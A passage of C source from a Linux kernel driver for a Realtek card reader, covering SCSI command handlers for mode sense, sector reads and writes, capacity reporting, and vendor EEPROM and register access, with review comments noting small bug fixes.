			dataSize = 108;
		}
	}
#endif

	buf = kmalloc(dataSize, GFP_KERNEL);
	if (buf == NULL) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	/* Low 6 bits of byte 2 carry the requested page code. */
	pageCode = srb->cmnd[2] & 0x3f;

	if ((pageCode == 0x3F) || (pageCode == 0x1C) ||
	    (pageCode == 0x00) ||
	    (pro_formatter_flag && (pageCode == 0x20))) {
		if (srb->cmnd[0] == MODE_SENSE) {
			if ((pageCode == 0x3F) || (pageCode == 0x20)) {
				ms_mode_sense(chip, srb->cmnd[0],
					      lun, buf, dataSize);
			} else {
				/* 4-byte MODE SENSE(6) header only. */
				dataSize = 4;
				buf[0] = 0x03;
				buf[1] = 0x00;
				if (check_card_wp(chip, lun)) {
					buf[2] = 0x80;
				} else {
					buf[2] = 0x00;
				}
				buf[3] = 0x00;
			}
		} else {
			if ((pageCode == 0x3F) || (pageCode == 0x20)) {
				ms_mode_sense(chip, srb->cmnd[0],
					      lun, buf, dataSize);
			} else {
				/* 8-byte MODE SENSE(10) header only. */
				dataSize = 8;
				buf[0] = 0x00;
				buf[1] = 0x06;
				buf[2] = 0x00;
				if (check_card_wp(chip, lun)) {
					buf[3] = 0x80;
				} else {
					buf[3] = 0x00;
				}
				buf[4] = 0x00;
				buf[5] = 0x00;
				buf[6] = 0x00;
				buf[7] = 0x00;
			}
		}
		status = TRANSPORT_GOOD;
	} else {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		scsi_set_resid(srb, scsi_bufflen(srb));
		status = TRANSPORT_FAILED;
	}

	if (status == TRANSPORT_GOOD) {
		unsigned int len = min(scsi_bufflen(srb), dataSize);
		rtsx_stor_set_xfer_buf(buf, len, srb);
		scsi_set_resid(srb, scsi_bufflen(srb) - len);
	}
	kfree(buf);

	return status;
}
/*
 * read_write - handle READ(6)/READ(10)/WRITE(6)/WRITE(10) and Realtek's
 * vendor pass-through read/write. Decodes the CDB into a (start sector,
 * sector count) pair, validates it against the card size, and delegates
 * the transfer to card_rw().
 *
 * NOTE(review): on the success path with a 5209 chip and max_payload set,
 * the final return value is the STATUS_SUCCESS result of the config-space
 * restore rather than TRANSPORT_GOOD — benign only if both constants are
 * equal (typically 0); confirm.
 */
static int read_write(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
#ifdef SUPPORT_SD_LOCK
	struct sd_info *sd_card = &(chip->sd_card);
#endif
	unsigned int lun = SCSI_LUN(srb);
	int retval;
	u32 start_sec;
	u16 sec_cnt;

	/* Wake the chip out of any power-save state before touching media. */
	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	if (!check_card_ready(chip, lun) || (get_card_size(chip, lun) == 0)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* First access after insertion: raise media-change once. */
	if (!(CHK_BIT(chip->lun_mc, lun))) {
		SET_BIT(chip->lun_mc, lun);
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_CHANGE);
		return TRANSPORT_FAILED;
	}

#ifdef SUPPORT_SD_LOCK
	if (sd_card->sd_erase_status) {
		/* Accessing to any card is forbidden
		 * until the erase procedure of SD is completed
		 */
		RTSX_DEBUGP("SD card being erased!\n");
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_READ_FORBIDDEN);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	if (get_lun_card(chip, lun) == SD_CARD) {
		if (sd_card->sd_lock_status & SD_LOCKED) {
			RTSX_DEBUGP("SD card locked!\n");
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_READ_FORBIDDEN);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}
#endif

	/* Decode LBA / transfer length from whichever CDB form arrived. */
	if ((srb->cmnd[0] == READ_10) || (srb->cmnd[0] == WRITE_10)) {
		start_sec = ((u32)srb->cmnd[2] << 24) | ((u32)srb->cmnd[3] << 16) |
			((u32)srb->cmnd[4] << 8) | ((u32)srb->cmnd[5]);
		sec_cnt = ((u16)(srb->cmnd[7]) << 8) | srb->cmnd[8];
	} else if ((srb->cmnd[0] == READ_6) || (srb->cmnd[0] == WRITE_6)) {
		/* READ(6)/WRITE(6): 21-bit LBA, 8-bit count. */
		start_sec = ((u32)(srb->cmnd[1] & 0x1F) << 16) |
			((u32)srb->cmnd[2] << 8) | ((u32)srb->cmnd[3]);
		sec_cnt = srb->cmnd[4];
	} else if ((srb->cmnd[0] == VENDOR_CMND) && (srb->cmnd[1] == SCSI_APP_CMD) &&
		   ((srb->cmnd[2] == PP_READ10) || (srb->cmnd[2] == PP_WRITE10))) {
		start_sec = ((u32)srb->cmnd[4] << 24) | ((u32)srb->cmnd[5] << 16) |
			((u32)srb->cmnd[6] << 8) | ((u32)srb->cmnd[7]);
		sec_cnt = ((u16)(srb->cmnd[9]) << 8) | srb->cmnd[10];
	} else {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* In some test, we will receive a start_sec like 0xFFFFFFFF.
	 * In this situation, start_sec + sec_cnt will overflow, so we
	 * need to judge start_sec at first
	 */
	if ((start_sec > get_card_size(chip, lun)) ||
	    ((start_sec + sec_cnt) > get_card_size(chip, lun))) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LBA_OVER_RANGE);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	if (sec_cnt == 0) {
		scsi_set_resid(srb, 0);
		return TRANSPORT_GOOD;
	}

	/* Three consecutive failures: stop retrying and report the error. */
	if (chip->rw_fail_cnt[lun] == 3) {
		RTSX_DEBUGP("read/write fail three times in succession\n");
		if (srb->sc_data_direction == DMA_FROM_DEVICE) {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_ERR);
		}
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	if (srb->sc_data_direction == DMA_TO_DEVICE) {
		if (check_card_wp(chip, lun)) {
			RTSX_DEBUGP("Write protected card!\n");
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_PROTECT);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}

		/* 5209: temporarily raise the PCIe max payload for writes. */
		if (CHECK_PID(chip, 0x5209) && chip->max_payload) {
			u8 val = 0x10 | (chip->max_payload << 5);
			retval = rtsx_write_cfg_dw(chip, 0, 0x78, 0xFF, val);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_ERROR);
			}
		}
	}

	retval = card_rw(srb, chip, start_sec, sec_cnt);
	if (retval != STATUS_SUCCESS) {
		if (chip->need_release & chip->lun2card[lun]) {
			/* Card is about to be released: report "not present"
			 * rather than counting this as an I/O failure. */
			chip->rw_fail_cnt[lun] = 0;
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		} else {
			chip->rw_fail_cnt[lun]++;
			if (srb->sc_data_direction == DMA_FROM_DEVICE) {
				set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
			} else {
				set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_ERR);
			}
		}
		retval = TRANSPORT_FAILED;
		TRACE_GOTO(chip, Exit);
	} else {
		chip->rw_fail_cnt[lun] = 0;
		retval = TRANSPORT_GOOD;
	}

	scsi_set_resid(srb, 0);

Exit:
	/* Restore the default max payload configured before the transfer. */
	if (srb->sc_data_direction == DMA_TO_DEVICE) {
		if (CHECK_PID(chip, 0x5209) && chip->max_payload) {
			retval = rtsx_write_cfg_dw(chip, 0, 0x78, 0xFF, 0x10);
			if (retval != STATUS_SUCCESS) {
				TRACE_RET(chip, TRANSPORT_ERROR);
			}
		}
	}

	return retval;
}
/*
 * read_format_capacity - handle READ FORMAT CAPACITIES.
 * Emits the capacity-list header followed by one descriptor (current
 * capacity) or two (plus a formattable-capacity descriptor when the MS
 * Pro formatter applies). Descriptor type: 2 = formatted media,
 * 3 = no media (capacity bytes then 0xFF). Block length is 0x200
 * (512-byte sectors).
 */
static int read_format_capacity(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned char *buf;
	unsigned int lun = SCSI_LUN(srb);
	unsigned int buf_len;
	u8 card = get_lun_card(chip, lun);
	u32 card_size;
	int desc_cnt;
	int i = 0;

	if (!check_card_ready(chip, lun)) {
		/* With the formatter enabled we still answer without media. */
		if (!chip->mspro_formatter_enable) {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}

	buf_len = (scsi_bufflen(srb) > 12) ? 0x14 : 12;

	buf = kmalloc(buf_len, GFP_KERNEL);
	if (buf == NULL) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	/* 4-byte header: 3 reserved bytes + capacity list length. */
	buf[i++] = 0;
	buf[i++] = 0;
	buf[i++] = 0;

	/* Capacity List Length */
	if ((buf_len > 12) && chip->mspro_formatter_enable &&
	    (chip->lun2card[lun] & MS_CARD) &&
	    (!card || (card == MS_CARD))) {
		buf[i++] = 0x10;
		desc_cnt = 2;
	} else {
		buf[i++] = 0x08;
		desc_cnt = 1;
	}

	while (desc_cnt) {
		if (check_card_ready(chip, lun)) {
			card_size = get_card_size(chip, lun);
			/* Number of blocks, big-endian. */
			buf[i++] = (unsigned char)(card_size >> 24);
			buf[i++] = (unsigned char)(card_size >> 16);
			buf[i++] = (unsigned char)(card_size >> 8);
			buf[i++] = (unsigned char)card_size;

			if (desc_cnt == 2) {
				buf[i++] = 2;
			} else {
				buf[i++] = 0;
			}
		} else {
			buf[i++] = 0xFF;
			buf[i++] = 0xFF;
			buf[i++] = 0xFF;
			buf[i++] = 0xFF;

			if (desc_cnt == 2) {
				buf[i++] = 3;
			} else {
				buf[i++] = 0;
			}
		}

		/* Block length: 0x000200 (512 bytes). */
		buf[i++] = 0x00;
		buf[i++] = 0x02;
		buf[i++] = 0x00;

		desc_cnt--;
	}

	buf_len = min(scsi_bufflen(srb), buf_len);
	rtsx_stor_set_xfer_buf(buf, buf_len, srb);
	kfree(buf);

	scsi_set_resid(srb, scsi_bufflen(srb) - buf_len);

	return TRANSPORT_GOOD;
}
/*
 * read_capacity - handle READ CAPACITY(10).
 * Returns the last LBA (card_size - 1) and the block length (0x200,
 * i.e. 512-byte sectors), both big-endian.
 *
 * Fix: the original transferred scsi_bufflen(srb) bytes out of an
 * 8-byte kmalloc allocation, overreading it whenever the host requested
 * more than 8 bytes. The transfer is now clamped to the 8 bytes actually
 * filled and the residue reflects any shortfall.
 */
static int read_capacity(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned char *buf;
	unsigned int lun = SCSI_LUN(srb);
	unsigned int len;
	u32 card_size;

	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* First access after insertion: raise media-change once. */
	if (!(CHK_BIT(chip->lun_mc, lun))) {
		SET_BIT(chip->lun_mc, lun);
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_CHANGE);
		return TRANSPORT_FAILED;
	}

	buf = kmalloc(8, GFP_KERNEL);
	if (buf == NULL) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	card_size = get_card_size(chip, lun);
	/* Last addressable LBA, big-endian. */
	buf[0] = (unsigned char)((card_size - 1) >> 24);
	buf[1] = (unsigned char)((card_size - 1) >> 16);
	buf[2] = (unsigned char)((card_size - 1) >> 8);
	buf[3] = (unsigned char)(card_size - 1);

	/* Block length: 0x00000200 (512 bytes). */
	buf[4] = 0x00;
	buf[5] = 0x00;
	buf[6] = 0x02;
	buf[7] = 0x00;

	/* Transfer at most the 8 bytes that were filled. */
	len = min(scsi_bufflen(srb), 8U);
	rtsx_stor_set_xfer_buf(buf, len, srb);
	kfree(buf);

	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	return TRANSPORT_GOOD;
}
/*
 * read_eeprom - vendor command: read `len` bytes of the on-board EEPROM.
 * Length comes from CDB bytes 4-5 (big-endian); the EEPROM is read one
 * byte at a time over SPI and at most scsi_bufflen(srb) bytes are
 * returned to the host.
 */
static int read_eeprom(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned short len, i;
	int retval;
	u8 *buf;

	/* Wake the chip out of any power-save state first. */
	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	len = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];

	buf = (u8 *)vmalloc(len);
	if (!buf) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	retval = rtsx_force_power_on(chip, SSC_PDCTL);
	if (retval != STATUS_SUCCESS) {
		vfree(buf);
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	for (i = 0; i < len; i++) {
		retval = spi_read_eeprom(chip, i, buf + i);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}

	len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
	rtsx_stor_set_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	vfree(buf);

	return TRANSPORT_GOOD;
}
/*
 * write_eeprom - vendor command: write the on-board EEPROM.
 * Length comes from CDB bytes 4-5 (big-endian). The magic length 511
 * requests a whole-chip erase instead of a data write; otherwise up to
 * min(len, scsi_bufflen) bytes from the host are written one at a time
 * over SPI.
 */
static int write_eeprom(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned short len, i;
	int retval;
	u8 *buf;

	/* Wake the chip out of any power-save state first. */
	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	len = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];

	retval = rtsx_force_power_on(chip, SSC_PDCTL);
	if (retval != STATUS_SUCCESS) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	if (len == 511) {
		/* Sentinel length: erase the entire EEPROM chip. */
		retval = spi_erase_eeprom_chip(chip);
		if (retval != STATUS_SUCCESS) {
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	} else {
		len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
		buf = (u8 *)vmalloc(len);
		if (buf == NULL) {
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		rtsx_stor_get_xfer_buf(buf, len, srb);
		scsi_set_resid(srb, scsi_bufflen(srb) - len);

		for (i = 0; i < len; i++) {
			retval = spi_write_eeprom(chip, i, buf[i]);
			if (retval != STATUS_SUCCESS) {
				vfree(buf);
				set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		}

		vfree(buf);
	}

	return TRANSPORT_GOOD;
}
static int read_mem(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short addr, len, i;
int retval;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = ((u16)srb->cmnd[2] << 8) | srb->cmnd[3];
len = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
if (addr < 0xFC00) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
buf = (u8 *)vmalloc(len);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len; i++) {
retval = rtsx_read_register(chip, addr + i, buf + i);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
vfree(buf);
return TRANSPORT_GOOD;
}
/*
 * write_mem - vendor command: write chip registers in the 0xFC00+ window.
 * Address from CDB bytes 2-3, length from bytes 4-5 (big-endian);
 * addresses below 0xFC00 are rejected. Host data is written one register
 * at a time with a full (0xFF) write mask.
 */
static int write_mem(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned short addr, len, i;
	int retval;
	u8 *buf;

	/* Wake the chip out of any power-save state first. */
	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	addr = ((u16)srb->cmnd[2] << 8) | srb->cmnd[3];
	len = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];

	/* Only the 0xFC00+ register window may be accessed this way. */
	if (addr < 0xFC00) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
	buf = (u8 *)vmalloc(len);
	if (buf == NULL) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	rtsx_stor_get_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	retval = rtsx_force_power_on(chip, SSC_PDCTL);
	if (retval != STATUS_SUCCESS) {
		vfree(buf);
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	for (i = 0; i < len; i++) {
		retval = rtsx_write_register(chip, addr + i, 0xFF, buf[i]);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}

	vfree(buf);

	return TRANSPORT_GOOD;
}
/*
 * GET_SD_CSD vendor command: return the cached raw CSD register of the
 * SD card in this LUN.  Fails when no card is ready or the LUN does not
 * currently hold an SD card.  The CSD was captured at card init time
 * into sd_card->raw_csd; no hardware access happens here.
 */
static int get_sd_csd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	struct sd_info *sd_card = &(chip->sd_card);
	unsigned int lun = SCSI_LUN(srb);

	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	if (get_lun_card(chip, lun) != SD_CARD) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	scsi_set_resid(srb, 0);
	rtsx_stor_set_xfer_buf(sd_card->raw_csd, scsi_bufflen(srb), srb);

	return TRANSPORT_GOOD;
}
/*
 * TOGGLE_GPIO vendor command: flip one of the chip's GPIO lines.
 * cmnd[2] selects the GPIO number; anything above 3 falls back to
 * GPIO 1.  The chip is woken out of suspend first.
 */
static int toggle_gpio_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	u8 gpio_no = srb->cmnd[2];

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	/* Out-of-range requests are redirected to GPIO 1 */
	toggle_gpio(chip, (gpio_no > 3) ? 1 : gpio_no);

	return TRANSPORT_GOOD;
}
#ifdef _MSG_TRACE
/*
 * TRACE_MSG vendor command: serialize the driver's ring buffer of trace
 * messages back to the host, optionally clearing it afterwards.
 *
 * Output layout: 4-byte big-endian message count, then for each message
 * (newest first): 2-byte line number, MSG_FUNC_LEN function-name bytes,
 * MSG_FILE_LEN file-name bytes, TIME_VAL_LEN timestamp bytes.
 * cmnd[2] != 0 clears the ring buffer after the copy.
 */
static int trace_msg_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned char *ptr, *buf = NULL;
	int i, msg_cnt;
	u8 clear;
	unsigned int buf_len;

	/* Worst-case size: header + every slot in the ring buffer */
	buf_len = 4 + ((2 + MSG_FUNC_LEN + MSG_FILE_LEN + TIME_VAL_LEN) * TRACE_ITEM_CNT);

	if ((scsi_bufflen(srb) < buf_len) || (scsi_sglist(srb) == NULL)) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	clear = srb->cmnd[2];

	buf = (unsigned char *)vmalloc(scsi_bufflen(srb));
	if (buf == NULL) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}
	ptr = buf;

	/* A valid slot at msg_idx means the ring has wrapped (it is full) */
	if (chip->trace_msg[chip->msg_idx].valid) {
		msg_cnt = TRACE_ITEM_CNT;
	} else {
		msg_cnt = chip->msg_idx;
	}
	/* Message count, big-endian */
	*(ptr++) = (u8)(msg_cnt >> 24);
	*(ptr++) = (u8)(msg_cnt >> 16);
	*(ptr++) = (u8)(msg_cnt >> 8);
	*(ptr++) = (u8)msg_cnt;
	RTSX_DEBUGP("Trace message count is %d\n", msg_cnt);

	/* Walk backwards from the write index: newest message first */
	for (i = 1; i <= msg_cnt; i++) {
		int j, idx;

		idx = chip->msg_idx - i;
		if (idx < 0)
			idx += TRACE_ITEM_CNT;

		*(ptr++) = (u8)(chip->trace_msg[idx].line >> 8);
		*(ptr++) = (u8)(chip->trace_msg[idx].line);
		for (j = 0; j < MSG_FUNC_LEN; j++) {
			*(ptr++) = chip->trace_msg[idx].func[j];
		}
		for (j = 0; j < MSG_FILE_LEN; j++) {
			*(ptr++) = chip->trace_msg[idx].file[j];
		}
		for (j = 0; j < TIME_VAL_LEN; j++) {
			*(ptr++) = chip->trace_msg[idx].timeval_buf[j];
		}
	}

	rtsx_stor_set_xfer_buf(buf, scsi_bufflen(srb), srb);
	vfree(buf);

	if (clear) {
		chip->msg_idx = 0;
		for (i = 0; i < TRACE_ITEM_CNT; i++)
			chip->trace_msg[i].valid = 0;
	}

	scsi_set_resid(srb, 0);
	return TRANSPORT_GOOD;
}
#endif
static int read_host_reg(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
u8 addr, buf[4];
u32 val;
unsigned int len;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = srb->cmnd[4];
val = rtsx_readl(chip, addr);
RTSX_DEBUGP("Host register (0x%x): 0x%x\n", addr, val);
buf[0] = (u8)(val >> 24);
buf[1] = (u8)(val >> 16);
buf[2] = (u8)(val >> 8);
buf[3] = (u8)val;
len = min(scsi_bufflen(srb), (unsigned int)4);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
return TRANSPORT_GOOD;
}
/*
 * WRITE_HOST_REG vendor command: assemble a big-endian 32-bit value
 * from the data buffer and write it to the host (MMIO) register at the
 * offset in cmnd[4].
 *
 * Fix: zero-initialize the staging buffer.  The original left buf[]
 * uninitialized, so a data transfer shorter than 4 bytes folded stack
 * garbage into the value written to hardware; missing bytes now read
 * as zero.
 */
static int write_host_reg(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	u8 addr, buf[4] = {0};
	u32 val;
	unsigned int len;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	addr = srb->cmnd[4];

	/* Copy at most 4 bytes from the host buffer */
	len = min(scsi_bufflen(srb), (unsigned int)4);
	rtsx_stor_get_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	/* Reassemble big-endian: buf[0] is the most significant byte */
	val = ((u32)buf[0] << 24) | ((u32)buf[1] << 16) | ((u32)buf[2] << 8) | buf[3];

	rtsx_writel(chip, addr, val);

	return TRANSPORT_GOOD;
}
/*
 * SET_VAR vendor command (SCSI_APP_CMD sub-op): set a driver variable.
 *
 * cmnd[3] == 1: set the stored card clock for the card type in cmnd[4]
 *               (XD_CARD/SD_CARD/MS_CARD) to cmnd[5].
 * cmnd[3] == 2: enable (cmnd[4] != 0) or disable LED blinking; when
 *               disabling, the chip is woken and the LED GPIO turned off.
 * Any other selector fails with "invalid field in CDB".
 */
static int set_variable(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned lun = SCSI_LUN(srb);

	if (srb->cmnd[3] == 1) {
		/* Variable Clock */
		struct xd_info *xd_card = &(chip->xd_card);
		struct sd_info *sd_card = &(chip->sd_card);
		struct ms_info *ms_card = &(chip->ms_card);

		switch (srb->cmnd[4]) {
		case XD_CARD:
			xd_card->xd_clock = srb->cmnd[5];
			break;

		case SD_CARD:
			sd_card->sd_clock = srb->cmnd[5];
			break;

		case MS_CARD:
			ms_card->ms_clock = srb->cmnd[5];
			break;

		default:
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	} else if (srb->cmnd[3] == 2) {
		if (srb->cmnd[4]) {
			chip->blink_led = 1;
		} else {
			int retval;

			chip->blink_led = 0;

			/* Wake the chip so the LED GPIO can be driven */
			rtsx_disable_aspm(chip);

			if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
				rtsx_exit_ss(chip);
				wait_timeout(100);
			}
			rtsx_set_stat(chip, RTSX_STAT_RUN);

			retval = rtsx_force_power_on(chip, SSC_PDCTL);
			if (retval != STATUS_SUCCESS) {
				set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
				TRACE_RET(chip, TRANSPORT_FAILED);
			}

			turn_off_led(chip, LED_GPIO);
		}
	} else {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	return TRANSPORT_GOOD;
}
/*
 * GET_VAR vendor command (SCSI_APP_CMD sub-op): read back one driver
 * variable as a single byte.
 *
 * cmnd[3] == 1: return the stored card clock for the card type in
 *               cmnd[4] (XD_CARD/SD_CARD/MS_CARD).
 * cmnd[3] == 2: return the LED blink flag.
 * Any other selector fails with "invalid field in CDB".
 */
static int get_variable(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned int lun = SCSI_LUN(srb);

	if (srb->cmnd[3] == 1) {
		struct xd_info *xd_card = &(chip->xd_card);
		struct sd_info *sd_card = &(chip->sd_card);
		struct ms_info *ms_card = &(chip->ms_card);
		u8 tmp;

		switch (srb->cmnd[4]) {
		case XD_CARD:
			tmp = (u8)(xd_card->xd_clock);
			break;

		case SD_CARD:
			tmp = (u8)(sd_card->sd_clock);
			break;

		case MS_CARD:
			tmp = (u8)(ms_card->ms_clock);
			break;

		default:
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}

		rtsx_stor_set_xfer_buf(&tmp, 1, srb);
	} else if (srb->cmnd[3] == 2) {
		u8 tmp = chip->blink_led;
		rtsx_stor_set_xfer_buf(&tmp, 1, srb);
	} else {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	return TRANSPORT_GOOD;
}
/*
 * DMA_READ/DMA_WRITE vendor command: move up to cmnd[4..5] (big-endian)
 * bytes between the host buffer and the chip's internal ring buffer via
 * a raw DMA transfer (1 s timeout).  Direction comes from the SCSI
 * command itself (sc_data_direction).
 */
static int dma_access_ring_buffer(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int retval;
	unsigned int lun = SCSI_LUN(srb);
	u16 len;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
